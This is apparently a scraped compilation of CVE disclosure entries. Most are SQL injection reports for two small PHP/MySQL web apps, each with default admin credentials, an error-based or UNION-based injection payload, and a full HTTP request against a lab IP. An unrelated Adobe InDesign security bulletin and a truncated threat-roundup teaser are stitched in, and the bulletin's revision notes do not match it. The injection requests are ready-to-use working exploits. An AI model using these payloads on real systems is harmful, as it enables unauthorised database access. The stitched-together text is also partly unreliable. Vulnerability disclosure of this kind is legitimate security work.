Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_brand.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_brand

Vulnerability location: /hss/classes/Master.php?f=delete\_brand,id

dbname =hss\_db,length=6

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_brand HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=brands
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46946: bug_report/SQLi-2.md at main · Venus-XATBLab-YT/bug_report

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_category

Vulnerability location: /hss/classes/Master.php?f=delete\_category,id

dbname =hss\_db,length=6

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=categories
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46947: bug_report/SQLi-1.md at main · Venus-XATBLab-YT/bug_report

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_helmet.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_helmet

Vulnerability location: /hss/classes/Master.php?f=delete\_helmet,id

dbname =hss\_db,length=6

\[+\] Payload: id=2 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_helmet HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=2 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46949: bug_report/SQLi-3.md at main · Venus-XATBLab-YT/bug_report

Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InDesign | APSB23-07

**Bulletin ID**

**Date Published**

**Priority**

APSB23-07  

January 10, 2023   

3

**Summary**

Adobe has released a security update for Adobe InDesign.  This update addresses multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution, application denial-of-service and memory leak.  

**Affected versions**

ID18.0 and earlier version.

ID17.4 and earlier version.                                           

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InDesign Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InDesign

Release: ID18.1

Windows and macOS

3

Adobe InDesign

Release: ID17.4.1  

Windows and macOS

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21587  

Improper Input Validation (CWE-20)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21588  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21589

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21590  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21591  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21592  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:   

*   Mat Powell with Trend Micro Zero Day Initiative - CVE-2023-21587; CVE-2023-21588; CVE-2023-21589; CVE-2023-21590; CVE-2023-21591; CVE-2023-21592

**Revisions:**

*   **July 13, 2022:** Bulletin APSB22-30 revised to include (CVE-2022-34245, CVE-2022-34246, CVE-2022-34247, CVE-2022-34248)
*   **July 16, 2022:** Changed CVE-2022-28851 to 3rd party open-source library vulnerability PhantomJS CVE-2019-17221

CVE-2023-21592: Adobe Security Bulletin

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_uploads.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_uploads

Vulnerability location: /queuing/admin/ajax.php?action=delete\_uploads, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_uploads HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46951: bug_report/SQLi-2.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_window.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_window

Vulnerability location: /queuing/admin/ajax.php?action=delete\_window, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_window HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46950: bug_report/SQLi-1.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/manage_user.php.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/manage\_user.php?id=

Vulnerability location: /queuing/admin/manage\_user.php?id=, id

dbname =queuing\_db

\[+\] Payload: /queuing/admin/manage\_user.php?id=-1%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /queuing/admin/manage\_user.php?id\=\-1%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close

CVE-2022-46956: bug_report/SQLi-5.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_window.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=save\_window

Vulnerability location: /queuing/admin/ajax.php?action=save\_window, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)&transaction\_id=1&name=Window 1 // Leak place ---> id

POST /queuing/admin/ajax.php?action\=save\_window HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)&transaction\_id=1&name=Window 1

CVE-2022-46953: bug_report/SQLi-4.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_user.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_user

Vulnerability location: /queuing/admin/ajax.php?action=delete\_user, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46952: bug_report/SQLi-3.md at main · Venus-XATBLab-YT/bug_report

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 6 and Jan. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Tag

#windows